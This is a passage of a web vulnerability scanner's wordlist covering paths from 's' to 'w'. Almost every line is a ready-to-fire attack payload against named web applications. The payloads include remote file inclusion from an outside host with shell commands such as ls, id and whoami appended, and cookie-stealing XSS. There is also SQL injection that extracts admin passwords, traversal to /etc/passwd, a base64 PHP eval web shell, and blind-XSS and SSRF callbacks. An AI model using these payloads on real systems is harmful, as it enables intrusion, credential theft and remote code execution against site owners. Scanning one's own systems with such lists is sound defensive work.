statystyka/
storage
store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
store/agora.cgi?page=whatever33.html
story/add.php?forumid=\xE2\x80\x99
stphpapplication.php?STPHPLIB_DIR=http://www.yxlink.com/nvs_test.txt
stphpbtnimage.php?STPHPLIB_DIR=http://www.yxlink.com/nvs_test.txt
stphpform.php?STPHPLIB_DIR=http://www.yxlink.com/nvs_test.txt
str.php?p=http://www.yxlink.com/nvs_test.txt
streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://www.yxlink.com/nvs_test.txt
strload.php?LangFile=http://www.yxlink.com/nvs_test.txt
stronghold-info
stronghold-status
struts-virtdir/<script>alert('test')</script>.do
struts/webconsole.html
studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls -al&ABSOLUTE_PATH_STUDIP=http://www.yxlink.com/nvs_test.txt?
studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls -al&_PHPLIB[libdir]=http://www.yxlink.com/nvs_test.txt?
style/
style/default/admin/open.gif
styles.php?toroot=http://www.yxlink.com/nvs_test.txt
styles/
styles/default/global_header.php?installed=23&domain=http://www.yxlink.com/nvs_test.txt
su.php
submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview
submit_abuse.php?path_prefix=http://www.yxlink.com/nvs_test.txt
submit_comment.php?path_prefix=http://www.yxlink.com/nvs_test.txt
subscp.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
subscription.php?acuparam=>\x22><ScRiPt>alert(213771818860)</ScRiPt>
suite/index.php?pg=http://www.yxlink.com/nvs_test.txt
sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>
supasite/admin_auth_cookies.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
supasite/admin_mods.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
supasite/admin_news.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
supasite/admin_settings.php?supa[include_path]=http://www.yxlink.com/nvs_test.txt
supasite/admin_topics.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
supasite/admin_users.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
supasite/admin_utilities.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
supasite/backend_site.php?supa[include_path]=http://www.yxlink.com/nvs_test.txt
supasite/common_functions.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
supasite/site_comment.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
supasite/site_news.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
support/include/open_form.php?include_dir=http://www.yxlink.com/nvs_test.txt?cmd=pwd
support/index.php?main=http://www.yxlink.com/nvs_test.txt
support_param.html/config?Admin_Name=&Admin_Phone=&Product_URL=<script>alert(222)</script>&Tech_URL=[XSS]&Apply=Apply
supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
surgemail/mtemp/surgeweb/tpl/shared/modules//swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
surgemail/mtemp/surgeweb/tpl/shared/modules//swfupload_f8.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
surgemail/mtemp/surgeweb/tpl/shared/modules//swfupload_f9.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
survey.inc.php?path=http://www.yxlink.com/nvs_test.txt
surveys/survey.inc.php?path=http://www.yxlink.com/nvs_test.txt
suud.php
svn
sw/index_sw.php?doc_directory=http://www.yxlink.com/nvs_test.txt
sw/lib_comment/comment.php?doc_directory=http://www.yxlink.com/nvs_test.txt?
sw/lib_find/find.php?doc_directory=http://www.yxlink.com/nvs_test.txt?
sw/lib_session/session.php?doc_directory=http://www.yxlink.com/nvs_test.txt?
sw/lib_up_file/file.php?doc_directory=http://www.yxlink.com/nvs_test.txt?
sw/lib_up_file/find_file.php?doc_directory=http://www.yxlink.com/nvs_test.txt?
sw/lib_user/find_user.php?doc_directory=http://www.yxlink.com/nvs_test.txt?
sw/lib_user/user.php?doc_directory=http://www.yxlink.com/nvs_test.txt?
swf
swf/flowplayer/flowplayer.swf?config=https://s3-us-west-2.amazonaws.com/bxss/fp.js
swf/jwplayer/player.swf?playerready=alert(document.domain)&debug=function(){alert(document.domain)}
swf/open-flash-chart/open-flash-chart.swf?get-data=(function(){alert(document.domain)})()
swf/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!prompt(document.domain)//&width&height
swfupload
swfupload//swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
swfupload//swfupload_f8.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
swfupload//swfupload_f9.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
swordcms/login.jsp
swordcms/platform/components/fckeditor/editor/plugins/upload/upload.jsp
sws/admin.html
sys/code/box.inc.php?config[\x5C\x22sipssys\x5C\x22]=http://www.yxlink.com/nvs_test.txt
sysadmin
sysadmins
sysbackup
syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>
syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>
syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>
syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>
syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>
sysmanage/
sysnet/registration.jsf?');};alert(222);</script><!--
sysstat/
system
system.log
system.php
system/
system/ImageImageMagick.php?glConf[path_system]=http://www.yxlink.com/nvs_test.txt
system/_b/contentFiles/gBIndex.php?gBRootPath=http://www.yxlink.com/nvs_test.txt?
system/admin/include/item_main.php?GLOBALS=http://www.yxlink.com/nvs_test.txt
system/admin/include/upload_form.php?GLOBALS=http://www.yxlink.com/nvs_test.txt
system/command/admin.cmd.php?GLOBALS=http://www.yxlink.com/nvs_test.txt
system/command/download.cmd.php?GLOBALS=http://www.yxlink.com/nvs_test.txt
system/eWebEditorNet/admin/login.aspx
system/eWebEditorNet/admin_login.aspx
system/editor/admin/login.aspx
system/editor/admin/login.php
system/editor/admin_login.asp
system/editor/admin_login.aspx
system/editor/admin_login.php
system/editor/login.asp
system/eweb/admin/login.asp
system/eweb/admin/login.aspx
system/eweb/admin/login.jsp
system/eweb/admin/login.php
system/eweb/admin_login.asp
system/eweb/admin_login.aspx
system/eweb/admin_login.jsp
system/eweb/admin_login.php
system/ewebeditor/admin/login.php
system/ewebeditor/admin_login.asp
system/ewebeditor/admin_login.aspx
system/ewebeditor/admin_login.php
system/ewebeditor/login.asp
system/ewebeditor/login.aspx
system/funcs/xkurl.php?PEARPATH=http://www.yxlink.com/nvs_test.txt
system/includes/pageheaderdefault.inc.php?_sysSessionPath=http://www.yxlink.com/nvs_test.txt
system/login.php?site_path=http://www.yxlink.com/nvs_test.txt
system/rss.php?id=1'
system/webeditor/admin_login.asp
system_dntb/Advanced.aspx
sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>
sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>
t
t.php
t47.php
tag
tag.php?id=1%27
tagit2b/tagmin/delTagUser.php?configpath=http://www.yxlink.com/nvs_test.txt?
tags
tags.php?BBCodeFile=http://www.yxlink.com/nvs_test.txt
tar
tar.bz2
tar.gz
taxonservice.php?dir=http://www.yxlink.com/nvs_test.txt?
tcb/files/auth/r/root
tcpdf
teatro/pub/pub08_comments.php?basePath=http://www.yxlink.com/nvs_test.txt
technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.yxlink.com/nvs_test.txt?
temp
temp.php
temp/
template.php?actionsPage=http://www.yxlink.com/nvs_test.txt?
template.php?blog_theme=http://www.yxlink.com/nvs_test.txt
template.php?pagina=http://www.yxlink.com/nvs_test.txt
template/Noir/index.php?site_path=http://www.yxlink.com/nvs_test.txt
template/Vert/index.php?pageAll=http://www.yxlink.com/nvs_test.txt
template/Vert/index.php?site_path=http://www.yxlink.com/nvs_test.txt
template/admin/skin/login/login.css
template/barnraiser_01/p_new_password.tpl.php?templatePath=http://www.yxlink.com/nvs_test.txt
template/default/footer.php?ROOT_PATH=http://www.yxlink.com/nvs_test.txt?cmd=ls
template/default/test/header.php?ROOT_PATH=http://www.yxlink.com/nvs_test.txt?cmd=ls
template/gwb/user_bottom.php?config[template_path]=http://www.yxlink.com/nvs_test.txt
template/purpletech/base_include.php?page=http://www.yxlink.com/nvs_test.txt?
template/rwb/user_bottom.php?config[template_path]=http://www.yxlink.com/nvs_test.txt
template/rwb/user_bottom.php?config[template_path]=http://www.yxlink.com/nvs_test.txt?&cmd=ls
template_csv.php?rInfo[content]=http://www.yxlink.com/nvs_test.txt
templates
templates/
templates/2blue/bodyTemplate.php?serverPath=http://www.yxlink.com/nvs_test.txt
templates/Official/part_userprofile.php?template_path=http://www.yxlink.com/nvs_test.txt
templates/barrel/template.tpl.php?renderer=http://www.yxlink.com/nvs_test.txt
templates/barry/template.tpl.php?renderer=http://www.yxlink.com/nvs_test.txt
templates/be2004-2/index.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
templates/datumVonDatumBis.inc.php?root=http://www.yxlink.com/nvs_test.txt
templates/default/header.inc.php?menu=http://www.yxlink.com/nvs_test.txt
templates/default/index_logged.php?main_loaded=1&cur_module=http://www.yxlink.com/nvs_test.txt
templates/default/posting.php?templatefolder=http://www.yxlink.com/nvs_test.txt
templates/default/postreply.php?templatefolder=http://www.yxlink.com/nvs_test.txt
templates/default/tpl_message.php?right_file=http://www.yxlink.com/nvs_test.txt
templates/deluxe/pm/newpm.php?templatefolder=http://www.yxlink.com/nvs_test.txt
templates/deluxe/posting.php?templatefolder=http://www.yxlink.com/nvs_test.txt
templates/deluxe/postreply.php?templatefolder=http://www.yxlink.com/nvs_test.txt
templates/footer.inc.php?root=http://www.yxlink.com/nvs_test.txt
templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>
templates/header.inc.php?root=http://www.yxlink.com/nvs_test.txt
templates/mylook/template.tpl.php?renderer=http://www.yxlink.com/nvs_test.txt
templates/oerdec/template.tpl.php?renderer=http://www.yxlink.com/nvs_test.txt
templates/pb/language/lang_nl.php?temppath=http://www.yxlink.com/nvs_test.txt
templates/penguin/template.tpl.php?renderer=http://www.yxlink.com/nvs_test.txt
templates/sidebar/template.tpl.php?renderer=http://www.yxlink.com/nvs_test.txt
templates/slashdot/template.tpl.php?renderer=http://www.yxlink.com/nvs_test.txt
templates/stylesheets.php?root=http://www.yxlink.com/nvs_test.txt
templates/text-only/template.tpl.php?renderer=http://www.yxlink.com/nvs_test.txt
templates/tmpl_dfl/scripts/index.php?dir[inc]=http://www.yxlink.com/nvs_test.txt
test
test-cgi.exe?<script>alert(document.cookie)</script>
test-cgi?/*
test.asp
test.aspx
test.chm
test.htm
test.html
test.jsp
test.mdb
test.php
test.php%20
test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
test.sqlite
test.txt
test/info.php
test/jsp/Language.jsp
test/jsp/buffer1.jsp
test/jsp/buffer2.jsp
test/jsp/buffer3.jsp
test/jsp/buffer4.jsp
test/jsp/declaration/IntegerOverflow.jsp
test/jsp/extends1.jsp
test/jsp/extends2.jsp
test/jsp/pageAutoFlush.jsp
test/jsp/pageDouble.jsp
test/jsp/pageExtends.jsp
test/jsp/pageImport2.jsp
test/jsp/pageInfo.jsp
test/jsp/pageInvalid.jsp
test/jsp/pageIsErrorPage.jsp
test/jsp/pageIsThreadSafe.jsp
test/jsp/pageSession.jsp
test/phpinfo.php
test/realPath.jsp
test_
testcgi.exe
testcgi.exe?<script>alert(document.cookie)</script>
testing
testing/
tests
tests.php
testweb
texis.exe/junk
texis/junk
text-base
thebox/bannedusers.php?file=http://www.yxlink.com/nvs_test.txt
theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
theme/META-INF/>+ACJ-+AD4APB-SCRIPT+AD7-alert(+ACI-DSecRG_XSS+ACI-)+ADz-/SCRIPT+AD7-
theme/breadcrumb.php?rootBase=http://www.yxlink.com/nvs_test.txt?
theme/default.php?root=http://www.yxlink.com/nvs_test.txt
theme/format.php?_page_content=http://www.yxlink.com/nvs_test.txt?
theme/format.php?_page_css=http://www.yxlink.com/nvs_test.txt?
theme/frames1.php?root=http://www.yxlink.com/nvs_test.txt
theme/frames1_center.php?root=http://www.yxlink.com/nvs_test.txt
theme/frames1_left.php?root=http://www.yxlink.com/nvs_test.txt
theme/frames1_top.php?root=http://www.yxlink.com/nvs_test.txt
theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.yxlink.com/nvs_test.txt
theme/settings.php?pfad_z=http://www.yxlink.com/nvs_test.txt
theme/test1.php?root=http://www.yxlink.com/nvs_test.txt
theme/test2.php?root=http://www.yxlink.com/nvs_test.txt
theme/test3.php?root=http://www.yxlink.com/nvs_test.txt
theme/test4.php?root=http://www.yxlink.com/nvs_test.txt
theme/test5.php?root=http://www.yxlink.com/nvs_test.txt
theme/test6.php?root=http://www.yxlink.com/nvs_test.txt
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\x5C\x22><script>alert('Vulnerable')</script>,/system/status/session
themes
themes.php?GLOBALS[theme_path]=http://www.yxlink.com/nvs_test.txt?
themes/blackorange.php?root=http://www.yxlink.com/nvs_test.txt
themes/container.php?theme_directory=http://www.yxlink.com/nvs_test.txt%00
themes/default/index.php?meta=http://www.yxlink.com/nvs_test.txt
themes/default/index.php?phpincdir=http://www.yxlink.com/nvs_test.txt
themes/default/layouts/standard.php?page_include=http://www.yxlink.com/nvs_test.txt?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
themes/default/preview_post_completo.php?dir=http://www.yxlink.com/nvs_test.txt
themes/header.php?theme_directory=http://www.yxlink.com/nvs_test.txt%00
themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>
themes/ubb/login.php?theme=http://www.yxlink.com/nvs_test.txt
thirdparty/fckeditor
thirdparty/jquery/uploadify/uploadify.swf?uploadifyID=00%22%29%29;}catch%28e%29{alert%281%29;}//%28%22&movieName=%22])}catch(e){if(!window.x){window.x=1;alert(2)}}//&.swf
thread
thread.php?skinco=black\x22><script>alert(111)</script>
thread.php?skinco=black\x22><script>alert(222);</script>
threads
thumb
thumb.php?url=data://text/plain;base64,PD9waHAgaWYoJF9QT1NUW2NdKXtldmFsKCRfUE9TVFtjXSk7fWVsc2V7cGhwaW5mbygpO30/Pg==&w=&t=.php&r=1
thumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
thumbnail
thumbnail.php?module=gallery&GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt
ticket.php?id=99999
tiki-galleries.php/>\x22><Script>alert(1)</scRipt>
tiki-list_file_gallery.php/>\x22><Script>alert(2)</scRipt>
tiki-listpages.php/>\x22><Script>alert(3)</scRipt>
tiki-orphan_pages.php/>\x22><Script>alert(4)</scRipt>
tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.yxlink.com/nvs_test.txt
timedifference.php?la=http://www.yxlink.com/nvs_test.txt
timthumb.php
tiny_mce
tinymce
tinymce/jscripts/tiny_mce
titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,md5(333),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/
tmp
tmp_view.php?file=/etc/passwd
tomcat-docs/appdev/sample/web/hello.jsp?test=<script>alert(12345)</script>
toolbar.loudmouth.php?mainframe=http://www.yxlink.com/nvs_test.txt
tools
tools/update_translations.php?_SESSION[path]=http://www.yxlink.com/nvs_test.txt?
top.php?laypath=http://www.yxlink.com/nvs_test.txt
topic/entete.php?subpath=http://www.yxlink.com/nvs_test.txt
topics
toplist.php?f=toplist_top10&phpbb_root_path=http://www.yxlink.com/nvs_test.txt
topsites/index.php?page=http://www.yxlink.com/nvs_test.txt?&cmd=uname -a
towels-0.1/src/scripture.php?pageHeaderFile=http://www.yxlink.com/nvs_test.txt
trace.axd
track.php?path=http://www.yxlink.com/nvs_test.txt
transcripts.php?action=view&deptid=1&userid=0&search_string=<script>alert(444)</script>
tsep/include/colorswitch.php?tsep_config[absPath]=http://www.yxlink.com/nvs_test.txt
tst
tsweb
ttCMS_path/lib/db/ez_sql.php?lib_path=http://www.yxlink.com/nvs_test.txt
twebs/modules/misc/usermods.php?ROOT=http://www.yxlink.com/nvs_test.txt
types
typo3/contrib/extjs/resources//charts.swf
u.php
ubbt.inc.php?GLOBALS[thispath]=http://www.yxlink.com/nvs_test.txt?
uddiexplorer/
uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:8089&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search
uddiexplorer/SearchPublicRegistries.jsp?operator=http://bxss.me:80&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
unavailable.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
unsubs.php?scdir=http://www.yxlink.com/nvs_test.txt
up.php?my[root]=http://www.yxlink.com/nvs_test.txt
update.php
update08.php?configfile=http://www.yxlink.com/nvs_test.txt
updates
upfile4k2.php
upgrade
upgrade/index.php/\x22><IMG SRC=\x22javascript:alert(2222)
upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=http://www.yxlink.com/nvs_test.txt
upload
upload.asp
upload.php?save_path=http://www.yxlink.com/nvs_test.txt?
upload.php?type=\x5C\x22<script>alert(document.cookie)</script>
upload/admin/frontpage_right.php?loadadminpage=http://www.yxlink.com/nvs_test.txt?
upload/top.php?maindir=http://www.yxlink.com/nvs_test.txt?
upload/xax/admin/modules/install_module.php?level=http://www.yxlink.com/nvs_test.txt?
upload/xax/admin/patch/index.php?level=http://www.yxlink.com/nvs_test.txt?
upload/xax/ossigeno/admin/install_module.php?level=http://www.yxlink.com/nvs_test.txt?
upload/xax/ossigeno/admin/uninstall_module.php?level=http://www.yxlink.com/nvs_test.txt?
upload_local.php?target=http://www.yxlink.com/nvs_test.txt
upload_local.php?target=http://www.yxlink.com/nvs_test.txt?
upload_multi.php?target=http://www.yxlink.com/nvs_test.txt
upload_multi.php?target=http://www.yxlink.com/nvs_test.txt?
uploader
uploadify
uploadify.php
uploadify.swf
uploadify/uploadify.swf?uploadifyID=00%22%29%29;}catch%28e%29{alert%281%29;}//%28%22&movieName=%22])}catch(e){if(!window.x){window.x=1;alert(2)}}//&.swf
uploads
uri
url
url_placeholder/pvm_cert_serveraction.php ?ajax=1&action=>\x22'><script>alert(document.cookie)</script>
url_placeholder/pvm_messagestore.php?msgid=&sender=&rcpt=&subject=&meta=&mailsize=&folder=allfolders&date1=<script>alert('xss')</script>&date2=&s=mails&favname=
url_placeholder/pvm_smtpstore.php?id=frozen&action=\x22><script>alert(\x22XSS\x22)</script>
url_placeholder/pvm_user_management.php?userfilter=1%22+onblur%3D%22alert%28%27xss%27%29
url_placeholder/sla/index.php?l=\x22><script>alert(document.cookie)</script>
url_placeholder/sys_tools.php?form=ping&page=sys_ping.php&ping=<script>alert(document.cookie)</script>
urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
urlinn_includes/config.php?dir_ws=http://www.yxlink.com/nvs_test.txt?
us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\x5Cboot.ini
usage/
usagedata/
user
user-properties.jsp?username=%3Cscript%3Ealert(%27xss%27)%3C/script%3E
user.php?act=is_registered&username=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,md5(333),0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23
user.php?caselist[bad_file.txt][path]=http://www.yxlink.com/nvs_test.txt&command=cat%20/etc/passwd
user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com
user.php?op=userinfo&uname=<script>alert('hi');</script>
user.php?op=userinfo&uname=<script>alert(1111);</script>
user.txt
user/list.php
user/reg/regajax.asp?action=getcityoption&province=%25
user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,%2527NVS_TEST%2527%252Busername%252B%2527NVS_TEST%2527%252Bpassword%252B%2527NVS_TEST%2527%2520from%2520KS_Admin%2500
user/storage_explore.php
user_guide
user_language.php?INDM=r3d.w0rm&language_dir=http://www.yxlink.com/nvs_test.txt?
user_new_2.php?home=http://www.yxlink.com/nvs_test.txt
user_uploads
useradmin
userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=%27
usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20@@servername=1;%20--
usercp
usercp.php/>\x22><ScRiPt>alert(213771818860)</ScRiPt>
usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
userfiles
userpay.php?skinco=black\x22><script>alert(222);</script>
userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd
users
users.csv
users.db
users.ini
users.log
users.mdb
users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
users.sql
users.sql.gz
users.sqlite
users.txt
users.xls
usr/extensions/get_calendar.inc.php?root_path=http://www.yxlink.com/nvs_test.txt
usr/extensions/get_infochannel.inc.php?root_path=http://www.yxlink.com/nvs_test.txt?cmd=id;pwd
usr/extensions/get_tree.inc.php?GLOBALS[\x5C\x22root_path\x5C\x22]=http://www.yxlink.com/nvs_test.txt?cmd=id;pwd
usr/extensions/get_tree.inc.php?GLOBALS[root_path]=http://www.yxlink.com/nvs_test.txt
utf8
util/barcode.php?type=../../../../../../../../../../../etc/passwd%00
util/icon_browser.php?subdir=<body onload=\x22alert(222)\x22>&app=horde
utilitaires/gestion_sondage.php?repertoire_visiteur=http://www.yxlink.com/nvs_test.txt
utilitaires/gestion_sondage.php?repertoire_visiteur=http://www.yxlink.com/nvs_test.txt?&cmd=ls
utils/class_HTTPRetriever.php?libcurlemuinc=http://www.yxlink.com/nvs_test.txt
v
v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.yxlink.com/nvs_test.txt
v.php
v1
vCard/admin/define.inc.php?match=http://www.yxlink.com/nvs_test.txt?&cmd=id
validator.php
variables.php3?Include=http://www.yxlink.com/nvs_test.txt
vb/includes/functions.php?classfile=http://www.yxlink.com/nvs_test.txt
vb/includes/functions_cron.php?nextitem=http://www.yxlink.com/nvs_test.txt
vb/includes/functions_forumdisplay.php?specialtemplates=http://www.yxlink.com/nvs_test.txt
vb/vb.php?filename=http://www.yxlink.com/nvs_test.txt
vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vbgooglemaphse.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,md5(333),salt,username,5,6,7,8,9,10,11,12,13+FROM+user-
vbgsitemap/vbgsitemap-config.php?base=http://www.yxlink.com/nvs_test.txt
vbgsitemap/vbgsitemap-vbseo.php?base=http://www.yxlink.com/nvs_test.txt
vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vc/vc/interface/index/que_scount.jsp?webid=1
vedit/editor/edit_htmlarea.php?highlighter=http://www.yxlink.com/nvs_test.txt?
vendor
version
viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=http://www.yxlink.com/nvs_test.txt?
videoPlayer/flowplayer.swf?config=https://s3-us-west-2.amazonaws.com/bxss/fp.js
view
view.php?ariadne=http://www.yxlink.com/nvs_test.txt?
view.php?id=http://www.yxlink.com/nvs_test.txt
view_func.php?i=http://www.yxlink.com/nvs_test.txt&l=testfile.txt?
view_user.php?list=1&letter=&sort_by='
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\x5C\x22><script>alert('Vulnerable')</script>;
viewforum.php?id=-1' UNION%20AL%20 SELECT 1,2,GROUP_CONCAT(CONCAT(md5(333), 0x3a, password)),4,5,6,7,8 FROM celer_users%23
viewpage.php?file=/etc/passwd
views/print/printbar.php?views_path=http://www.yxlink.com/nvs_test.txt
viewsource?/etc/passwd
viewthread.php?tid=<script>alert(1111/);</script>
viewtopic.php?t=1&highlight=%2527
viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
visible_count_inc.php?statitpath=http://www.yxlink.com/nvs_test.txt
visitor.php?_SERVER[DOCUMENT_ROOT]=http://www.yxlink.com/nvs_test.txt??
vmpNYIGBwV.jsp
volume.php?config[public_dir]=http://www.yxlink.com/nvs_test.txt?
vote.php?Madoa=http://www.yxlink.com/nvs_test.txt?
vote.php?act=dovote&name[1/**/and/**/(select/**/1/**/from(select/**/count(*),concat(0x7c,(select/**/(Select/**/md5(888888888881))/**/from/**/information_schema.tables/**/limit/**/0,1),0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x/**/limit/**/0,1)a)%23][111]=aa
votebox.php?VoteBoxPath=http://www.yxlink.com/nvs_test.txt
vp/configure.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
vq/demos/respond.pl?<script>alert('Vulnerable')</script>
vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string=\x22><script>alert(1);</script>
vtigercrm/index.php?module=Products&action=index&parenttab=\x22><script>alert(1);</script>
vtigercrm/index.php?module=Users&action=Authenticate&user_password=\x22><script>alert(1);</script>
vuln-search.aspx?term=</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://www.yxlink.com/nvs_test.txt
w
w-agora_path/add_user.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
w-agora_path/create_forum.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
w-agora_path/create_user.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
w-agora_path/delete_notes.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
w-agora_path/delete_user.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
w-agora_path/edit_forum.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
w-agora_path/mail_users.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
